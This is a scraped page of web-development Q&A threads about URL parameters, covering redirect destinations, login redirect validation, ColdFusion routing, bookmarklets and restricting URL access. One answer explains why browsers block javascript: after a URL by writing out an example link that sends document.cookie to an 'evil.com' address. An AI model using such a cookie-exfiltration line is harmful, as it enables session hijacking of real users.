URL: Include a parameter inside a destination query - url

I've searched a lot to try and solve this problem, but I'm not quite sure what to search for. I didn't really manage to find anything.
Essentially I'm working on a website in which users can register for an event. However, if the user is not logged in, I need to redirect them to the registration screen. This much I've been able to accomplish without much difficulty. However I need to redirect back to the event that they attempted to register for.
My real problem is that the URL of the page I need to return to contains an a parameter, and I'm not sure how to make the registration page take that parameter into account when it redirects back.
Currently when an anonymous user tries to go to
http://[...].com/drupal/?q=civicrm/event/register&id=6
I have it redirect you to
http://[...].com/drupal/?q=user/register&destination=civicrm/event/register&id=6
However, once the form is submitted the "&id=6" is not taken as part of the destination parameter, which means you just go to.
http://[...].com/drupal/?q=civicrm/event/register
Which is not a valid page.
Is there a way for me make the destination parameter include "&id=6"?
On a whim I've also tried.
[...]destination='civicrm/event/register&id=6'
[...]destination="civicrm/event/register&id=6"
[...]destination=civicrm/event/register#id=6

You need to url-encode the value for your destination. Try this:
[..]destination=civicrm/event/register%3Fid%3D6
%3F is hex code for question mark (?), %3D is code for equals (=).

Related

Is it possible to resolve navigation outcome in order to validate it?

I've got a WebFilter that redirects to the login page in my application. In order to redirect back to the referring page I've also added a view parameter called redirectOnLogin which is then used on successful logins in order to perform the final navigation.
If one were to manipulate this query parameter, one could easily provoke JSF navigation errors. I would therefore like to pre-empt this by checking that the outcome is valid but I've not been able to uncover a mechanism for pre-validating a JSF outcome.
Easiest and best is to make sure the redirectToLogin parameter cannot be manipulated. Or that manipulation is detected.
You could solve this in (at least) two ways
Taking the original page name, adding a 'salt' to it and creating a hash.
Addin this has that in the request to the login server
Make sure it is returned by the login server (maybe adding it as # to the return page or as a param.
On receiving it on the 'redirectOnLogin' page, use the page name, the same salt and create a hash in the same way. Compare these and if they match you are fine, if they don't throw an error.
Or you could
Store the 'redirectOnLogin' page in a session to
Check on returning from the login server if it matches with the page you end-up on.

Linkedin url function

I came across a post on Quora addressing why LinkedIn uses tokens like *1_*1_*1_*1_*1_* in their url. The answer mentioned these help track where a user came from to enable a user to return to where he came from.
How exactly does the URL store that type of information, and why would they use that token instead of something more conventional, such as ?last=this-page?
Appears that those are used to carry forward and populate the form values on the left for the search page. The 1 is probably a section or form number, * means wildcard (empty on form). The _ is just a separator. Try populating a previously empty form field and click search You'll you see one of the previously *1 portions of the url be replace with the value you provided in your form.

Is there a best method to evaluate URL variables to determine the appropriate page?

I am using ColdFusion 9.0.1.
I have a new web site that uses Bikes.cfm and Makers.cfm as template pages. I need to be able to pass BikeID and MakerID to both of the these pages, along with other variables. I don't want to use the Actual page name in the URL, such as this:
MyDomain.com/Bikes.cfm?BikeID=1234&MakerID=1234
I want my URL to look more like this:
MyDomain.com/?BikeID=1234&MakerID=1234
I need to NOT specify the page name in the URL.
I want these two URLs to access different data:
MyDomain.com/?BikeID=1234&MakerID=1234 // goes to bike page
MyDomain.com/?MakerID=1234&BikeID=1234 // goes to maker page
So, if BikeID appears in the URL before MakerID, go to the Bikes.cfm page. If MakerID appears before BikeID, go the Makers.cfm page.
Is there an easy and existing method to arrange the URL keys in such a way to have them point to the appropriate page?
Should I just parse the the URL as a list and determine the first ID and go to the appropriate page? Is there a better way?
Any thoughts or hints or ideas would be appreciated.
UPDATE -- It certainly appears that using the order of parameters in a URL is a bad idea for the following reasons:
1) many programs append variables to the URL
2) some programs may reorder the variables
3) GoogleBot may not consider order relevant and will most likely not index the site correctly.
Thanks to everyone who provided advice in a positive manner that my approach was probably a bad idea and would not produce the results I wanted. Thanks to everyone who suggested alternate means to produce the results I wanted.
If anyone of you positive people would like to put your positive comment/advice as an answer, I'd be happy to accept it as the answer.
Despite my grave misgivings about the whole idea, here's how I would do it if I were forced to do so:
index.cfm:
<cfswitch expression="#ListFirst(cgi.query_string, '=')#">
<cfcase value="BikeID">
<cfinclude template="Bikes.cfm">
</cfcase>
<cfcase value="MakerID">
<cfinclude template="Makers.cfm">
</cfcase>
<cfdefaultcase>
<cfinclude template="Welcome.cfm">
</cfdefaultcase>
</cfswitch>

Combine URL and a javascript bookmarklet together

I need to access some data in someone's site. The way to get to that page is visiting http://www.foosite.com and click a link which has javascript:foo(); to bring out the real data.
foo() is like:
function foo(param){
createXXXCookie('COOKIE_NAME', param, 60);
window.location.href="/current/location";
}
So this is basically setting the cookie and reload the page again. During page load, the document ready reads COOKIE_NAME and display the corresponding data.
I want to use MS Excel to grab some data from this page. So I was looking for a one go way to get the data. Since in browser address bar, I can enter http://www.foosite.com first and then enter javascript:foo(); to invoke foo(). I was wondering if combining the URL and the bookmarklet, like http://www.foosite.com;javascript:foo(); could work? I actually tried this, but it seems IE/FF/GC will skip javascript:... part and just proceed the first part of URL.
This is not possible.
Had it been possible, it would be a deadly security hole.
Email someone a shortlink to http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie)), and move on from there to auto-submitting forms.

Make a URL available only from within application

Say, I have a URL to edit a post .../posts/1/edit
I don't want this URL to navigate to a link when a user pastes it on his browser. However, if I have a link to this URL from within my application, the application should route to this URL.
Is it possible to achieve something like that?
I have no authentication system in the application.
I am just looking to see if there is an elegant solution to it. Else, I am sure I can find ways around. Thanks.
Use request.referer to get the page the user is coming from. This should allow you to achieve what you want. Note that this is not 100% reliable, sometimes the referer header might not be set. But in most cases it will work.
Alternatively, you can set a session variable that indicates whether the user is allowed (or not) to open a page (set a session variable on the main page with session[:allowed] = true, check its presence on the hidden page). When the user does not have a session variable set, render error or redirect to the main page (something like render :status=>403 and return unless session[:allowed]).
One of the easy ways would be send a unique header with the GET request and in the edit page, make sure you verify this header and only if it is present go ahead else throw a 401.
Ofcourse to make it much simpler, send a unique argument like /posts/1/edit?application="not-browser-1234"
and in edit page
if $_GET[application] != "not-browser-1234"
exit

Resources